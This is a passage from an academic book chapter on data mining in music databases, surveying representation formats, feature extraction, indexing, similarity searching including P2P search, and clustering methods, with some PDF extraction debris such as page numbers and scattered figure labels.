acter in a play. This problem is considered as the most intractable and can significantly impact the quality of the analysis (Byrd & Crawford, 2002), as music phrases may appear audibly only few times while occuring frequently in the music score (e.g., buried within repeated chords). Different approaches (Pickens, 2001; Liu, Wu, & Chen, 2003) have been proposed in literature in order to address polyphony. Repetition of occurrence signals a pattern in almost all mining fields (database, web, or text mining). However, in all these fields, patterns are repeated exactly. In music mining, one should not focus on exact repetition of patterns, due to variation and ornamentation that are present in music data (Rolland & Ganascia, 2002). Therefore, algorithms searching for music patterns such as Cambouropoulos et al. (1999) and Clifford and Iliopoulos (2004, see section Methods for MIDI Representation) should take into account this peculiarity as well. Data quality is a factor that is taken into account by all mining fields. Data cleansing methods are used to avoid the discovery of patterns that will lead to pitfalls. Therefore it comes at no surprise that music data are very prone to errors, since there is very little quality control publicly available (Byrd & Crawford, 2002). However, music data have an additional source of “error,” which is the result of differences in performance-related characteristics; differences in key, tempo, or style cause different instantiations of an identical musical score. These factors have to be additionally taken into account when searching for patterns. All the aforementioned issues concern the effectiveness of the music mining process. Another important aspect is efficiency. Music databases tend to be large, both due to the large number of music pieces they contain and the large size of each piece. The objective is, therefore, to develop scalable algorithms for music mining. It is worth noticing that many existing approaches are influenced from soft-computing methodologies. Soft computing methodologies involve fuzzy sets,
37
Mining in Music Databases
neural networks, genetic algorithms, rough sets and hybridizations. These methodologies opt for providing approximate solutions at low cost, thereby speeding up the process (Mitra, Pal, & Mitra, 2004). Although there have been attempts to provide solutions for very large databases (e.g., in the field of neural networks), in general, the problem of scalability to extremely large database sizes is still a challenging issue (Mitra, Pal, & Mitra, 2004). Moreover, algorithms for finding repeating patterns are confined to main-memory resident data. Hence, another challenge is to develop algorithms for disk-resident data. Finally, it must be argued that although the incorporation of background knowledge in the mining process is considered important, it is generally a vague issue. It seems that domain-specific knowledge in music mining is sine qua non. What is, therefore, required is the systematic development of methods to incorporate this knowledge in the music mining process, a task that is very hard to consider.
Chapter Outline In what follows this chapter, we summarise existing work on music mining. First, we give the necessary background on music databases. Next, we examine the task of similarity searching, which has attracted significant attention in research related to CBMIR. Similarity searching in music mining is of high importance, as it serves as a primitive for more complex undertakings. In the two sections that follow, we study methods for clustering and classification of music data. Clustering methods are for unsupervised learning, whereas supervised learning methods have been mainly used for tasks such as genre classification. Next, we move on to examine algorithms for detecting repeating patterns, and we also discuss the special issue of theme finding. In the final section, we conclude this chapter and present the perspective of music mining.
38
MUSIC DATABASES It is only in the last decade that large scale computer-based storage of sound and music has been possible. Additionally, the increasing ease of distribution of music in computer files over the Internet gave further impulse to the development of digitised music databases as well as to new methods for music information retrieval (MIR) in these collections. Initial efforts for information retrieval (IR) in music databases relied on the well-studied text IR, that is, on the metadata of the music objects (title, composer, performer, genre, date, etc. — see the extension of the mp3 format, called ID3-Tag, for an example). Although abundantly used, even nowadays, the traditional metadata of a music object give rather minimal information about the actual content of the music object itself. Moreover, metadata in most cases are manually maintained, therefore this process is notoriously time consuming. On the other hand, queries based on humming (using a microphone) or on a small piece of a musical file, are a more natural approach to MIR. These types of queries lie within the CBMIR. In CBMIR, an actual music piece is required in order to compare its content with the content of the music pieces already available in the database.
Music Data Representation and Format Conversion Music is available in two basic representations: the symbolic representation (MIDI, humdrum format) and the acoustic representation (audio format — wav, mp3, wma, etc.). Their key difference lies in the fact that the family of symbolic representations carries in their objects information of what a musical player should perform, whereas the acoustic representations comprise a specific recorded performance of a music piece. In other words, the term “music” encompasses
Mining in Music Databases
both performance directions as well as resulting sounds. The symbolic representation can further be separated into two classes, according to the targeted performer. Thus, there exist symbolic representations aimed at digital devices such as the MIDI and humdrum formats as well as human-oriented symbolic representations that are collectively referred to as conventional music notation (CMN). A MIDI (MIDI is the musical instrument digital interface specification) object consists of predefined “events” that are quantified factors that define a musical performance (Owen, 2000). Typical events include the notes to be played, the time instance and the force these notes should be played and the type of instrument playing them, just to name a few. Following the high detail an event may contain, a MIDI object can quite accurately describe a music performance and thus its use is rather popular, especially for classical music playback. Additionally, the MIDI format is also used in order to communicate music between digital devices since it is codified4 and has wide acceptance, thus offering interoperability between different types of music-aware devices. CMN commonly includes numerous features that are not defined in the MIDI protocol, such as rests, slurs, barlines, triplets and chromatisms. O’Maidin and Cahill (2001) propose a complex object framework that serves as a container for a collection of objects modelled for music scores as well as iterators for use with the algorithms available, the C.P.N.View (common practice notation view). C.P.N.View is a class library for representing musical scores in a form suitable for arbitrary processing. Another approach for a score-based music representation is presented by Hoos et al. (1998), which utilises the GUIDO Music notation. The GUIDO music notation format is a novel, general purpose formal language for representing score level music in human-readable way. Music in the acoustic representation consists of a time-series of sampled signal amplitude
values. These values represent the air pressure changes created by the music source that propagate from the source (e.g., loudspeaker or violin) to the listener’s ears as air pressure fluctuations. A very simple method of illustration of acoustical signals is to draw these signals as a graph of air pressure versus time (Figure 1). In that case, the representation of the acoustical signal is called time-domain representation and the amplitude of the waveform is the amount of air pressure change (Roads, 1996) Since the conversion of symbolic music to and from CMN is generally admitted to be easy, in this section interest is focuses on the process of analysing music in the acoustic representation, so as to identify the elements that constitute the piece of music in question (Klapuri, 2004). This process is known as music transcription. The notation utilised for the symbolic representation of the acoustic format can be any symbolic representation offering sufficient information for the transcribed piece to be performed. Although skilled musicians are able to perform music transcription with high success (Klapuri, 2004), computer music transcription is generally admitted to be very difficult and poorly performing (Yang, 2002; Pickens, 2004). The performance of the computer systems degrades even more when the transcribed music piece is polyphonic. A polyphonic music piece (see Figure 2), for the purposes of this work, refers to a music piece wherein at any time instance, more than one sound may occur — that is, more than one voice, or, in simple
Figure 1. Time domain representation of a signal 1
A m p litu d e
0
A ir pressu re
-1
T im e
39
Mining in Music Databases
Figure 2. An example of a monophonic, homophonic and polyphonic music piece.
terms, more than one note, at a time. In contrast, in a monophonic score only one voice/note is playing at any time (see Figure 2). The last 10 years of research in polyphonic music transcription brought a great deal of knowledge to the area, though no generally applicable all-purpose system exists. The latest proposals presented a certain degree of accuracy in limited complexity polyphonic music transcription (Davy & Godsill, 2003; Bello, 2003). Their common limitations include as prerequisites, for acceptable performance, a specific number of concurrent sounds and absence of percussive instruments. Despite the unfavourable research template, a small number of commercial approaches to a music transcription system have been available (AKoff, 2001; Arakisoftware 2003, Innovative 2004; Seventh, 2004)5 , though their performance is rather poor as far as accuracy is concerned (Klapuri, 2004).
Synopsis of the Process for Knowledge Extraction in Music Databases Having described how music databases are being organized, we now move on to examine the whole process of knowledge extraction. In general, the process of knowledge discovery in databases (KDD process) refers to the broad process of finding knowledge in data, while connoting the “high-level” application of particular data mining methods. Analogously, in music databases, the unifying goal of the KDD process is to extract knowledge from music data in the context of
40
large music databases. This objective is achieved by using music data mining algorithms that extract what is deemed knowledge, according to the specifications of measures and thresholds and using a database along with any required pre-processing, sub-sampling and transformations of that database. The overall KDD process has been established during previous years to contain the stages that are illustrated in Figure 3. In summary, we can identify three main parts in the process: the pre-processing of music data, the core-mining step and the post-processing of mined knowledge. In the context of music data mining, the aforesaid three main parts are instantiated as follows. Regarding pre-processing, in related research most of the effort has been attracted by methods for feature extraction and selection. Also related to this part is the research on music database indexing, which can improve the effectiveness and efficiency of the selection stage (see Figure 3). The core-mining part involves several methods that have been adapted from other data mining areas. But, due to peculiarities of music data, several other, novel methods have been developed as well. Finally, although the post-processing part is inextricable in the KDD process, in music data mining it has received relatively less attention compared to other data mining areas. In the remainder of this chapter we elaborate further on the first two parts, and give examples and methods for the problems that have been examined in recent research. Concluding this discussion, it is useful to contemplate a sample scenario on the KDD process
Mining in Music Databases
Figure 3. Overview of steps constituting the KDD process (Fayyad, Piatetsky-Shapiro & Smyth,1996)
in music databases. Assume a music analyst who has a database of pop, rock and heavy metal songs from the years 1970 to 2000. As an initial step, the analyst performs a selection of all songs from the 1980s decade. Next, he or she selects as features the timbre, pitch and rhythm. For the core-mining, he or she selects a classification algorithm that has been adapted for genre classification. The outcome of this process seeks to characterize the selected songs according to their genre.
Music Features Music consists of numerous features. Among them, pitch, rhythm, timbre and dynamics are considered to be the most semantically important ones (Byrd & Crawford, 2002). For western music in particular, pitch carries the highest relative weight of information followed by rhythm (Byrd & Crawford, 2002). For the MIR process to perform matching algorithms on the music data, descriptions of
these features for the music data are necessary. Thus, the previously mentioned representations require a conversion from their original format to the format defined by each MIR system. The conversion process is also known as feature extraction. The selection of features to be conversed by the feature extraction process is implementation dependent. That is, a variety of alternatives exist with respect to the music characteristics that should be included in the final format. The feature selection and extraction process can be separated based on the representation of the music piece in symbolic and acoustic feature extraction, while the former can also be divided into monophonic, homophonic and polyphonic (see Figure 4). Music in the form of acoustic representation requires special analysis in order to extract features such as pitch and rhythm, while the non-triviality of the problem is reflected by the number of methods developed. The key idea in this case is audio transcription to feature events.
Figure 4. Feature extraction process for (a) acoustic and (b) symbolic music pieces
41
Mining in Music Databases
The most common features (Wieczorkowska & Ras, 2001) are the coefficients of time-domain analysis (Papaodysseus et al., 2001; Paraskevas & Mourjopoulos,1996), spectral analysis (Papaodysseus et al.; Paraskevas & Mourjopoulos, 1996; Kostek & Wieczorkowska, 1997) and wavelet analysis (Wieczorkowska, 2001). Pitch detection6 is dealt with via time-domain fundamental period pitch detection, autocorrelation pitch detection (see Figure 5a), adaptive filter pitch detection (see Figure 5b), cepstrum analysis and frequency-domain pitch detection. It should be noted that no pitch detection algorithm is totally accurate and some that appear to be, utilise music inputs that follow specific constraints or show increased computational requirements (non real-time). Key difficulties in pitch detection include attack transients, low and high frequency identification, myopic pitch tracking and acoustical ambience. In the case of polyphonic acoustic signals, the complexity rises additionally, while attempts towards this direction usually apply frequencydomain analysis techniques within a fundamental pitch or strong harmonics selective mechanism. Rhythm detection can be divided into three levels: low-level (event detection), mid-level (transcription into notation) and high-level (style analysis). As with pitch detection, rhythm detection is also inherently difficult due to inaccurate human performance of musical scores as well as the ambiguity of the music notation7 . Moving on to music in the form of symbolic representation, feature extraction from MIDI-like music files is rather easier. The results of the
transcription, the step of the acoustic representation feature extraction, are apparently already available in some form. In monophonic music no note may sound until those currently sounding have finished; in homophonic music, simultaneous notes may start and finish sounding together, while in polyphonic music, a note may sound before a previous one has finished. Addressing homophonic and polyphonic music is achieved by reduction to monophonic and homophonic, respectively, and by modification of the methods utilised for monophonic music. The problem of monophonic music symbolic feature extraction can be reduced to n-dimension by retaining only n different features of information described in the music file. Additional approaches include N-grams (e.g., sliding windows and repeating patterns) and shallow structure methods (Pickens, 2001) (e.g., statistical measures, lightweight computation and music theory analysis). Monophonic reduction is an initial attempt to solve the problem of simultaneous notes sounding by selection of only one of the notes sounding in any discrete time. Accordingly, monophonic methods can be utilised for feature extraction from the received monophonic music. The key issue in monophonic reduction is the “representative” note selection method. In homophonic reduction, instead of selecting only one note at each time step, all notes at each time step are retained and the reduction that occurs is assuming independence of overlapping duration notes (Pickens, 2001).
Figure 5. Pitch detection process with (a) autocorrelation and (b) adaptive filter
42
Mining in Music Databases
Finally, as a means of features that can be indexed, clustered and matched for similarity, research has used hidden Markov models (HMM). An HMM is a Markov chain, where each state generates an observation. One can only see the observations, and the goal is to infer the hidden state sequence. From the observable sequence of outputs, one infers the most likely dynamical system. The result is a model for the underlying process. Alternatively, given a sequence of outputs, the user infers the most likely sequence of states. Hidden Markov models (HMM) have been extensively used in MIR. Numerous approaches (Pikrakis, Theodoridis, & Kamarotos, 2002; Shifrin, Pardo, Meek, & Birmingham, 2002; Velivelli, Zhai, & Huang, 2003) have utilised HMMs in order to represent music pieces in a database and the queries posed. In Pikrakis, Theodoridis, and Kamarotos (2002), a method for automated search of predefined sound patterns within a large number of sound files is presented, using HMMs. In Shifrin, Pardo, Meek, and Birmingham (2002), the authors use a stochastic representation of both music sequences in the system and the queries, with hidden Markov models in order to handle queries that contain errors or key and tempo changes. Velivelli et al. (2003) utilise HMMs that can model predefined patterns and simultaneously identify and match an audio segment for a given query.
Indices for Music Data The selection of appropriate features is considered very important in multimedia information retrieval. Meaningful features not only help in the effective representation of objects but also enable the use of indexing schemes for efficient query processing. As far as the symbolic representation is concerned, recent research proposed that features could be represented in string format and accordingly presented string indices (Hsu, Liu, &
Chen, 1998; Lee & Chen, 2000; Chen & Chen, 1998; Liu, Hsu, & Chen, 1999). These approaches are not easily adopted for multiple features, lack data scalability for large music data (Lee & Chen, 2000) and generally their string matching proves slower than numeric matching (Lo & Chen, 2003). In order to address these inefficiencies, Lo and Chen (2003) proposed a multi-feature numeric indexing structure that transforms music feature strings into numeric values. As already mentioned, the most common features of acoustic music are produced by time, spectral and wavelet analyses. The coefficients collected from each of these analyses can be indexed in TV-Trees (Lin, Jagadish, & Faloutsos, 1994), locality-sensitive hashing schemes (Yang, 2002) and S-Indexes (Dervos, Linardis, & Manolopoulos, 1997). In addition, Reiss, Aucouturier, and Sandler (2001) compare four different multidimensional indexing schemes for music data, the KD-Tree, the K-Tree, the multidimensional quick-sort and the box assisted method. The authors conclude that KD-Tree is significantly more efficient than the other methods, especially for high-dimensional data. Finally, the authors in Won, Lee, Ku, Park and Kim (2004) utilise an M-Tree in which a selection of features is stored, claiming thus a 65% gain in space requirements.
Difference from Other Database Types This section summarizes the differences of music databases from other structured or semi-structured ones. The term “semi-structured databases” has emerged to describe databases that have some structure but neither regular, nor known a priori (Abiteboul, 1997). It is precisely for this reason that most semi-structured data models are selfdescribing. Following this structure, musical data contain, apart from the main data corpus, textual metadata. A standard such protocol is the ID3-tag for mp3 files. Another emerging standardization effort in this direction is mpeg-7 (ISO/IEC, 2003),
43
Mining in Music Databases
formally named “Multimedia Content Description Interface,” which describes multimedia content. Nevertheless, we focus on research methods oriented towards the content, which refers to the unstructured data in music databases (for this reason, we use the term music database to refer to this unstructured part). The aforementioned differences reflect also the methods that have been employed for data management. In particular, for indexing and querying semi-structured databases. Abiteboul (1997) describes several solutions which are very much different from the requirements and solutions that were presented in the previous section. Relational databases could be involved in the process of managing music data, but only when abstract data types (ADT) are provided. This corresponds to an object-relational DBMS. In fact, such a system for managing sequences has been developed (Seshadri, Livny & Ramakrishnan, 1996). Although one may consider the option of storing MIDI sequences (or even acoustic ones) within such a system, the peculiarities of music data present very different challenges (for instance, as mentioned, very specialized indexing solutions have been developed for music query processing in contrast to the standard ones used by object-relational systems). For this reason, this direction has not been followed in related work.
SIMILARITY SEARCHING As a result of the rapid developments in WWW, users are able to search for music information among various and large amounts of music data (this is especially popular within P2P systems). This reveals the need for development of effective similarity-searching methods for music data. Additionally, another significant area where similarity-searching is applied is CBMIR systems. Similarity searching in music data differs from searching other types of data in the following:
44
(a) (b)
(c)
users may perceive in different ways the notion of similarity between music pieces; the possibility of ad hoc nature in similarity-searching query posing (e.g., querying by humming), which brings the need for high tolerance against inconsistencies; and the influence of data representation (symbolic or acoustic) on the designation of similarity-searching algorithms. The importance of similarity searching stems from its special role as primitive for other data mining tasks, like information retrieval, clustering and classification.
Perception of Similarity in Music Data The stimuli received by a human observer lead to the experience of the event that produced these stimuli, through the interpretation process of the brain. The reception made through the five senses available to humans is the sole contributing channel of information. The final representation of the event that produced the stimuli in the human brain has little direct relevance with what the sensory transducers received, as it is subject to extended further processing by the brain (Shepard, 1999). Accordingly, cognitive psychology studies the final representation corresponding to the perceived stimuli. Music, being a physical stimulus as well, is amenable to the very same extended-brain processing after being received by the acoustical8 system. Thus, musical cognition is up to a certain degree subjective (perception ambiguity) while numerous preferred or habitual ways of music cognition/listening do exist. Based on the Gestalt Laws of Grouping, a number of principles exist by which people organise isolated parts of a visual or acoustic stimulus into groups or whole objects. There are five main laws of grouping: proximity, similarity, continuity, closure and common fate. All of these laws fall under a sixth law, that of simplicity. Although
Mining in Music Databases
Gestalt laws are usually applied to visual stimuli, their appliance in other senses, such as the auditory, is well known. According to the Gestalt laws, during the experience of music listening, humans do not hear a series of disconnected or random tones. Music is perceived as a whole by means of sound relation- based pitch similarity, time proximity and other factors. Music perception can lead to the identification of melodies, patterns and forms. Recent work by McAdams et al. (2004) suggested that music similarity is determined based on surface features of the musical material. These findings are also supported by numerous previous works in the field. Additionally, the listener sensitivity to these features is not related to musical education, apart from the terminology used in order to express the similarity or difference. The work considers as surface features duration/ rhythm, pitch/melody, timbre, gesture, texture, articulation and, to a lesser degree, dynamics and harmony, although, some of these features may be more or less overlapping. Additionally, based on studies that have been conducted on what people attend to while detecting similarity, musicians initially observed dynamics, art, texture and then noticed pitch height and contour; non-musicians’ attention was firstly drawn to dynamics and art, while texture and pace were subsequently noticed (Lamont & Dibben, 2001). Musical recognition is greatly affected by the ability of the listener to detect different levels of similarity in different musical elements. Studies on response times in dissonant and consonant differentiation proved that distinguishing dissonant rather than consonant chords is faster, while musical training had a great effect in the number of correct responses (Bigand, Madurell, Tillmann, & Pineau, 1999). However, in experimentation in chord similarity perception, experience did not seem to have an effect on perception (Hubbard, 1996).
The mood or emotional atmosphere evoked when listening to a musical piece was revealed by McAdams et al. (2004) to be relative to musical similarity. In the perception of musical emotion, timbre, tempo, pitch and rhythm are of critical importance. Fast tempos are regarded as happy and joyful, while slow tempos tend to be considered as sad or gloomy (White, 2004). A more or less similar effect appears with pitch, with high and simple pitches (melodies) producing a feeling of happiness, and lower and more complex pitches (melodies) sadness. The combination of rhythm and pitch is known to affect the degree a musical piece is scarring (Schellenburg, Krysciak, & Campbell, 2001; White, 2004).
Similarity Searching for Symbolic Data Methods for MIDI Representation In symbolic music data, the features of music are available in some form, as already previously mentioned, while their extraction reduces in n-dimensional strings of the desired n features. Accordingly, the current literature has long used string processing techniques and indices for similarity searching in symbolic music data. Research is oriented in both monophonic and polyphonic symbolic data. A number of approximate string matching techniques for musical data, both monophonic and polyphonic, have been extensively studied (Clifford & Iliopoulos, 2004; Cambouropoulos et al., 1999; Crawford, Iliopoulos, & Raman, 1998). Despite the fact that approximate string matching has widely been utilised in various fields of computer science, the approximation methods were not devised for the peculiarities of musical data. Optimal solutions for exact matching proposed by Crawford, Iliopoulos and Raman (1998) are the Knuth-Morris-Pratt and variants of the
45
Mining in Music Databases
Boyer-Moore algorithms. As far as approximate matching is concerned, Clifford and Iliopoulos (2004) and Cambouropoulos et al. (1999) propose as optional the δ-, γ- and (δ,γ)- approximation. In δ-approximation “two strings p and t are δ-approximate if and only if they have the same length, and each value of p is within δ of its corresponding value in t” (Clifford & Iliopoulos, 2004). In γ-approximation, p and t must have equal length and additionally have a sum of absolute differences for corresponding values less or equal to γ. Finally, for p and t to be (δ,γ)- approximate, they must be both δ- and γ-approximate. The best complexity of these algorithms, in general, is O(nm/w), with w being a computer word. Another approach for approximate matching is δ-, γ-matching using fast Fourier transforms with respective complexities of O(δn logm) and O(σn logm), σ being the size of alphabet. Additionally, δ-matching can also reduce into two instances of the problem known as less-than matching (Amir & Farach, 1995) with complexity O(). In this case, for p and t we require all the values of p to be less than or equal to the corresponding ones in t. String matching techniques have also been proposed for a number of other musicological problems, such as approximate matching with gaps, approximate repetitions and evolutionary chains detection (Iliopoulos, Lemstrom, Niyad, & Pinzon, 2002). In musical patterns, reinstatement with a certain degree of spontaneity or differentiation is rather common. Thus, searching for notes that do not appear successively is in some cases required. A gap size-bounded solution can be solved in O(nm) time (Clifford & Iliopoulos, 2004). The problem of approximate repetitions is formulated as “Given a music sequence S, an approximate repeating pattern P is an approximate subsequence of S that appears at least twice in S.” The exact repetition problem has O(n logm) complexity and approximate δ-, γ- and (δ,γ)-matching solutions requires O(n2) time. In order to address the issue of similarity in polyphony, two main approaches exist. The
46
first method consists of polyphonic reduction to monophony or homophony and accordingly applies monophonic similarity algorithms, while in the second special design similarity algorithms are directly implemented on polyphonic data (Liu et al., 2003). In the special design similarity algorithms for polyphonic data direction, the authors Clifford and Iliopoulos (2004), opting for exact match of a pattern occurring distributed horizontally in a sequence of notes, proposed the use of a modified shift-or algorithm with O(|Σ| + m) + O(N) complexity, with |Σ| being the number of distinct pitches, m the size of the pattern and N the length of original score. For the case of approximate matching, the same work suggests the modified Wu-Mamber algorithm, with approximate distance, defined using the edit distance for each character. Research by Szeto et al. (2003) suggest the extraction of streams based on the musical perception theory that music is perceived in groupings. The proposed methodology separates each musical note according to pitch value and timing into event vectors and, following clusters, these vectors-producing streams. Thus polyphony reduces to the problem of clustering. In Doraisamy and Ruger (2004), the authors propose an n-gram construction with the use of sliding windows that include events made of pitches with the same or similar onset times. Pickens et al. (2003) deal with polyphony by ignoring all duration information for every note in the score, and then retaining at each new note onset all the notes that also begin at that onset.
Methods for CMN Representation Most of the up-to-date research in MIR is concerned with music in acoustic and symbolic MIDI file representation. However, the symbolic representation, as already mentioned, includes music in the form of notation, especially CMN. The use of CMN is of great importance to music libraries and those musically trained. The number
Mining in Music Databases
of musical pieces in music notation included solely in the U.S. Library of Congress is believed to be exceeding six million pieces (Byrd, 2001). Thus, the use of mechanical assistance in IR in these collections can be invaluable. Of the many evolution-impeding reasons for the CMN MIR, its complexity, and consequently the complexity of the tools required to be built in order to process CMN, as well as the unavailability of a standardised format of CMN are the most hampering. Initial work on the field could only handle simple monophonic music (Maidín, 1998), while in some cases the query had to be in the acoustic format (Bainbridge,1998). Commercial applications have been available, such as Finale (www. finalemusic.com), that can perform searchs by content in CMN (though searching is limited in a single score at each time), as well as in finding the next match for certain Boolean criteria. The latest developments in commercial packages, such as Nightingalesearch (Byrd, 2001), have overcome the previously mentioned impediments, while offering matching based on pitch and/or duration with approximate matches under certain tolerance conditions. However, Nightingalesearch has numerous shortcomings, the most important of which is that the supported music files are proprietary of the Nightingale (AMNS, 2000) software.
Similarity Searching for Acoustic Data In similarity searching in acoustic musical data, feature extraction from the music signal produces the required mapping in which similarity functions as well as speed-up indexing schemes operate. Up-to-date related work on acoustic dataacoustic query, content-based MIR systems is limited. Yang (2002) proposes a spectral indexing algorithm for CBMIR. Its feature-extraction process attempts to identify distinctive notes or rhythmic patterns. The features are used to con-
struct “characteristic sequences,” which in the next step are indexed in a probabilistic scheme, the locality-sensitive hashing (LSH). The LSH scheme allows both false positive and negative matches, which are compensated in a later step based on the uniformity in time of music tempo changes. Experimental results indicate high retrieval accuracy for different similarity types. In Won et al. (2004), the authors propose a CBMIR system that is mainly oriented towards servicing different types of queries. The acceptable query types include audio files, common music notation as well as Query-By-Humming (QBH). The MIDI format is used as an intermediate music object representation. The selection of features is called “representative melody” and is registered into an M-tree structure, in which melodies are inserted based on their average length and pitch variation together with melody signatures representing the variation pattern. The used distance is a time-warping function. Preliminary results indicate a 65% gain in space requirements when using the collection of features instead of the whole melodies. As far as the work in Won et al. (2004) is concerned, its main disadvantage is the assumption that the users’ query must include at least one of the parts that they gather in order to create the “representative melodies.” And as this might work for QBH, it might not for a random piece of music file included in the index, especially for a small one. In addition, polyphonic music transcription is known to be very difficult and poor performing (Yang, 2002; Pickens, 2004). Regarding the work in Yang (2002), its feature selection mechanism is oriented towards identifying different types of similarity in music pairs. Additionally, the selected features can lead to false negatives, which have to be addressed in a post-processing step. Finally, Yang (2002) uses a specialised indexing mechanism. The approach proposed by Karydis et al. (2004) presents a feature extraction method based on the first few DFT coefficients of the audio file
47
Mining in Music Databases
(sequence). The extracted features are grouped by minimum bounding rectangles (MBRs) and indexed by means of a spatial access method. Given a range query and some results, the authors present a false alarm resolution method that utilises a reverse order schema while calculating the Euclidean distance of the query and results in order to avoid costly calculations. Comparative evaluation to an already existing algorithm shows significant reduction in execution times. The proposed scheme does not introduce false negatives, according to the used similarity model, and, more importantly, it uses general purpose indexes (Rtrees), which allow for a direct implementation in existing RDBMSs.
Similarity Searching Methods in P2P Networks P2P systems are a rapidly developing area. Searching therein for music information9 presents additional requirements in comparison to the customary client-server model. The size of the transferred data to propagate and resolve a query, the CPU burden produced at each peer to resolve a query as well as the underlying structure of the P2P network and the searching scheme adopted are some the most important facts that need be taken into consideration. In particular, even for compressed acoustic data (e.g., mp3 and wma) the traffic produced to solely propagate the query by a simple flooding algorithm is prohibitive. Thus, similarity searching in P2P networks preferably develops in more than one step, using various granularity samples. That is, when a coarse-grain (small size) representation of the query returns a match, only then does the querying peer send a more fine-grained (and larger in size) query. Additionally, acoustic data also require increased CPU processing in order to perform similarity functions. Since P2P networks typically consist of computers that are utilised otherwise than the P2P application alone, a CPU resource protection must exist in order to ensure that a queried
48
computer is primarily allocating CPU according to its user’s needs (Yang, 2003). P2P networks can be classified based on the control over data location and network topology as unstructured, loosely structured and highly structured (Li & Wu, 2004). Unstructured P2P networks follow no rule regarding where data is stored while the network topology is arbitrary (Gnutella). Loosely structured P2P networks do not have precisely determined data location and network architecture (Freenet). Finally, in highly structured networks, data storage and network topology are explicitly defined (Chord). What is more, P2P networks can also be classified according to the number of central directories of document locations: centralised, hybrid and decentralised. Centralised networks maintain a central directory in a single location (Napster), hybrid networks maintain more than directories in super-peers (Kazaa) while for the decentralised (Chord), no central directory is kept. Karydis et al. (2005) study several similarity searching algorithms for acoustic data in unstructured P2P networks. The searching schemes that are being imposed include brute-force flooding BFS, quantitative probabilistic >RES (Yang & Garcial-Molina, 2002), qualitative ISM (Kalogeraki, Gunopulos, & Zeinalipour-Yazti, 2002) and numerous others (Li & Wu, 2004). In the case of the >RES algorithm, the query peer Q propagates the query q to a subset k of its neighbour peers, all of which returned the most results during the last m queries. Thus, searching for similarity initiates from the most probably larger parts of the networks and is followed by the algorithms discussed in the previous section according to the format of the music file. In the ISM approach for each query, a peer propagates the query q to the peers that are more likely to reply to the query based on a profile mechanism and a relevance rank. The profile is built and maintained by each peer for each of its neighbouring peers. The information included in this profile consists of the t most recent queries with matches, their matches as well
Mining in Music Databases
as the number of matches the neighbouring peer reported. The relevance rank function is computed by comparison of the query q to all the queries for which there is a match in each profile. In structured P2P networks, the common scenario of searching scheme is based on distributed hash tables (DHT). In such systems, each node is assigned with a region in a virtual address space, while each shared document is associated with a value (id) of this address space. Since in highly structured networks data storage and network topology are explicitly defined, a shared document is stored in the node with address space that the document’s id falls within. Thus, locating a document requires only a key lookup of the node responsible for the key. Despite the great acceptance of DHT P2P networks (Chord, Pasty, Can, Koorde, Viceroy, etc.), hashing does not support range queries.
reduction of their number and finishing, should a desired quantity of clusters be reached. There are two types of hierarchical clustering algorithms in order to build a tree from an input set S: the agglomerative approach (bottom-up) and the divisive approach (top-down). The former is the most common approach and the process begins with sets of one element that are subsequently merged until S is achieved as the root. In the latter, a recursive partitioning of S occurs until sets of one element are reached. Recent work on hierarchical clustering for music databases by Lampropoulos et al. (2004) utilises acoustic data, while the extracted features are based on spectral analysis and tempo. In detail, the spectral features extracted are the mean centroid, mean roll-off, mean flux, zero-crossing and short-time energy. The metrics used therein are Euclidean distance and cosine distance. The clustering algorithm for n data points develops in four steps:
CLUSTERING 1. Clustering in music data has contributed techniques to automatically organise collections of music recordings in order to lessen human documentation efforts. Therefore, clustering algorithms are used to detect groups between music pieces in cases where further information (e.g., genre, style, etc.) is not available or not required to be predefined, that is, data-driven categorisation of music styles.
2.
3.
4.
Hierarchical Clustering Hierarchical clustering is renowned for its usage in multidimensional dataset pattern detection. Analysis based on hierarchical clustering is a statistical method for identification of groups of data (clusters), which indicate relative homogeneity, on the basis of measured characteristics. The analysis begins with one piece of data put in a separate cluster and develops by iteratively combining clusters into broader ones, aiming at
initially, each data point occupies a cluster of its own; then, for a desired number of k clusters if the number of available clusters is k stop, else find the pair of clusters with the highest similarity value; merge these clusters, decrease cluster number by one and re-compute the distances between the new cluster and all existing clusters; and finally, repeat procedure from step 2, until all items are clustered into a single cluster of size n.
A variation of the hierarchical clustering approach is utilised in Hoos, Renz, & Gorg, 2001) in order to reduce search effort by purging some of the data that do not match the query, and more importantly, by identifying promising candidate data. This approach utilises a modified hierarchical clustering, resulting in a balanced tree where each node has up to 32 children. In order to additionally speed up the search within this
49
Mining in Music Databases
tree, each node stored is assigned with three bit matrices, the entries of which indicate whether the transition probabilities in the probabilistic model for the cluster corresponding to that node exceed a specific value. The use of these matrices supports rapid selection of the most promising sub-cluster at each step at the internal nodes during the search. The introduction of the previously mentioned mechanisms serve in pruning large sections that cannot include an exact match (since the occurrence of transition probabilities are null) as well as guiding searches to promising candidate pieces as fast as possible.
Other Types of Clustering The remaining categories of clustering, apart from hierarchical, consist of k-clustering (partitioning), self-organizing maps (SOM) as well as hybrid solutions. The target of k-clustering is the identification of the best set of k cluster centroids, assigning each instance to its nearest centroid, a process that additionally determines the structure of the partition. A SOM is a group of several connected nodes mapped into a k-dimensional space following some specific geometrical topology (grids, rings, lines, etc). The nodes are initially placed at random, while subsequent iterative adjustment occurs based on the distribution of input along the k-dimensional space. The following are some prominent research works that fall within hybrid category previously mentioned.In work by Pienimäki et al. (2004) polyphonic music is segmented into phrases using initially a monophonic reduction that retains only the highest pitch notes and subsequently an existing melodic phrase algorithm. The hierarchical structure proposed therein is an amalgamation of paradigmatic (Cambouropoulos & Widmer, 2000) and collection (Eerola, Järvinen, Louhivuori, & Toiviainen, 2001) clustering. In paradigmatic clustering, each single document inserted is analysed in order to identify inner structure, while collection clustering attempts to cluster a
50
given collection of documents. Initial clustering occurs at the pragmatic level, where variants of a common phrase are clustered together based on a similarity matrix, in which distances are measured by harmonic and melodic edit distances. Each document is described using adjacency lists, while each such list is associated with a document and stores results of paradigmatic and surface level analyses of the corresponding document. At the final step, clustering of the whole collection occurs using the adjacency lists. Another interesting approach in music clustering is proposed by Cooper et al. (2003). The approach suggested therein is based on methods developed for segmenting still images. Initial time-domain analysis transforms the musical data into features, while similarity is based on the cosine distance. The pairwise similarity of all permutations of features for each music file is computed leading to a “partial time-indexed similarity matrix” (Cooper & Foote, 2003) for the detection of audio segment boundaries. The following step includes clustering of the calculated segments by means of similarity analysis, which consists of identification of time-separated repeated segments as well as cases of over-segmentation errors. Based on the segmentation boundaries, the full similarity matrix can be estimated. Then, segment clustering occurs based on singular value decomposition. The proposed scheme, instead of computing the full sample-indexed similarity matrix, orientates towards segment-level clustering, achieving CPU load 